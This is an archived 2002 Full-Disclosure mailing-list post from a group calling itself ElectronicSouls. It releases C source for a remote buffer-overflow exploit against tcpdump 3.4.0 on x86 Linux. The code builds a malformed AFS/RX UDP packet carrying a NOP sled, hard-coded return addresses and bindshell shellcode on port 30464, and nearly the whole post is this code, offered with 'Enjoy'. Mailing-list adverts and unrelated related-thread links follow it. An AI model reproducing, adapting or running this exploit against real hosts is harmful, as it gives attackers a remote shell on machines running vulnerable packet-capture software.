[Full-Disclosure] [ElectronicSouls] - tcpdump exploit

From: es@hush.com
Date: 11/29/02


From: es@hush.com (es@hush.com)
Date: Fri, 29 Nov 2002 00:11:44 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We are releasing this for political reasons. We don't need to backdoor
tcpdump to get root on you, like those scriptkiddies do, we can find
our own bugs to exploit from mailing lists and then write our exploits.

Enjoy.

# cat ES-tcpdump-xp-not-finished.c
   /*
    * MAD PRIVATE !%&#*
    * Linux x86 Tcpdump 3.4.0 (maybe others!) Remote Exploit (with -s 500 or higher)
    * (C) BrainStorm - ElectronicSouls - \x45\x53 0wnez ;)
    * DO NOT DISTRIBUTE !
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    #define ADDR 0xbffff248
    #define OFFSET 0
    #define NUM_ADDR 10
    #define NOP 0x90
    #define NUM_NOP 100

    #define RX_CLIENT_INITIATED 1
    #define RX_PACKET_TYPE_DATA 1
    #define FS_RX_DPORT 7000
    #define FS_RX_SPORT 7001
    #define AFS_CALL 134

    struct rx_header
    {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;
        u_int32_t serial;
        u_char type;
        u_char flags;
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
    "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
    "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
    "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
    "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
    "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
    "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
    "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
    "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
    "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

    long resolve(char *name)
    {
     struct hostent *hp;
     long ip;

     if ((ip=inet_addr(name))==-1) {
     if ((hp=gethostbyname(name))==NULL) {
     fprintf (stderr,"Can't resolve host name [%s].\n",name);
     exit(-1);
     }
     memcpy(&ip,(hp->h_addr),4);
     }
     return(ip);
    }

    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;

     fprintf(stderr,"\n\n [ E l e c t r o n i c S o u l s ] \n");
     fprintf(stderr,"Tcpdump 3.4.0 Remote Exploit by BrainStorm\n\n");

     if (argc<2)
     {
     printf("Usage: %s <host> [offset]\n",argv[0]);
     exit(-1);
     }

     if (argc==3) offset=atoi(argv[2]);
     return_addr+=offset;
     fprintf(stderr,"[+] Using return addr: %#x\n",return_addr);

     addr.sin_family=AF_INET;
     addr.sin_addr.s_addr=resolve(argv[1]);
     addr.sin_port=htons(FS_RX_DPORT);

     if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0)
     {
     perror("socket()");
     exit(-1);
     }
     sin.sin_family=AF_INET;
     sin.sin_addr.s_addr=INADDR_ANY;
     sin.sin_port=htons(FS_RX_SPORT);

     if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
     perror("bind()");
     exit(-1);
     }
     memset(buffer,0,sizeof(buffer));

     rxh=(struct rx_header *)buffer;
     rxh->type=RX_PACKET_TYPE_DATA;
     rxh->seq=htonl(1);
     rxh->flags=RX_CLIENT_INITIATED;

     lptr=(long int *)(buffer+sizeof(struct rx_header));

     *(lptr++)=htonl(AFS_CALL);
     *(lptr++)=htonl(1);
     *(lptr++)=htonl(2);
     *(lptr++)=htonl(3);
     *(lptr++)=htonl(420);

     chptr=(char *)lptr;
     sprintf(chptr,"1 0\n");
     chptr+=4;

     memset(chptr,'A',120);
     chptr+=120;

     lptr=(long int *)chptr;

     for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
     chptr=(char *)lptr;

     memset(chptr,NOP,NUM_NOP);
     chptr+=NUM_NOP;

     shellcode[30]=(char)(46);

     memcpy(chptr,shellcode,strlen(shellcode));
     chptr+=strlen(shellcode);

     sprintf(chptr," 1\n");

     if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)
     {
     perror("send()");
     exit(-1);
     }
     fprintf(stderr,"Overflow sent, now wait for your shell =) ..\n\n");
     close(sock);
     return(0);
    }

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Winner of the Best Eyes Award"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nIU8MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGnYAnRPF4oJBlaU0
2AGLKlLdTNrRinezAJ9EpWGLb2K8esivw+01R5LKf4mCxQ==
=Bh2L
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427



Relevant Pages

  • Re: Issues mirroring drives with Vinum in FreeBSD 4.8-RELEASE
    ... Having seen that message in many of your replies on the lists, ... vinum: reading configuration from /dev/da0s1h ... using volume root for root device ... fstab: /etc/fstab:9: Inappropriate file type or format ...
    (freebsd-questions)
  • Re: kmail wont import eudora addresses
    ... As root I looked at the std.vcf file and it is empty even ... > though the kmail program lists all the imported eudora addresses. ... > as root there was no problem with importing the list. ... In previous versions of Kab and Kaddressbook you could use several ...
    (comp.os.linux.misc)
  • Re: Can not run Programs that Require Root Access
    ... updates I click on view packages & it asks for my root password. ... I've just recently installed FC7, ... I read messages from the public lists. ...
    (Fedora)
  • Re: [opensuse] There will be no reply-to-muning on this list
    ... problem lies (the mail server settings) ... You're absolutely right about solving it at the root, ... Standards are what allows us to interoperate. ... On lists that do not munge, I've never had anyone send a message to the ...
    (SuSE)
  • Re: Update problems
    ... You can't run apt-* from the command line as your regular user account. ... The root account has no password and, as such, can't be logged in. ... For single commands, or small lists of them, the second one if the ...
    (Ubuntu)